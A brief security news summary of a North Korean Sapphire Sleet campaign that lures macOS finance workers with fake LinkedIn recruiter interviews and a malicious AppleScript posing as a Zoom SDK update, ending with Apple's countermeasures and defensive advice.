North Korea's Sapphire Sleet (APT38/Lazarus Group offshoot) is targeting macOS users in a multi-stage attack campaign. Attackers pose as fake recruiters on LinkedIn, lure finance professionals with phony job interviews, then deliver a malicious AppleScript disguised as a Zoom SDK update. The script uses thousands of blank lines to hide malicious code, invokes legitimate Apple binaries for cover, and chains curl commands to fetch progressively complex payloads. The attack ultimately harvests credentials, cryptocurrency wallets, browser history, keychains, Apple Notes, and Telegram login details. Apple has since deployed XProtect signatures and Safari Safe Browsing protections to block the campaign automatically. Organizations are advised to educate users about unsolicited LinkedIn communications and never run scripts shared through messages without IT approval.
Table of contents
Bad Apple(Script) commandsSort: